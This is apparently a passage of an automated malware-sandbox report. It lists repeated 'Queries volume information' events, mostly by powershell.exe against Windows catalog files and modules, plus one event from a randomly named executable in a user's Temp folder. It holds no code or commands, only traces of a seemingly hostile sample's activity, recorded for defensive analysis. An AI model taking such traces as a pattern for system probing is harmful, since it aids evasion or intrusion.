Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\193938922.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
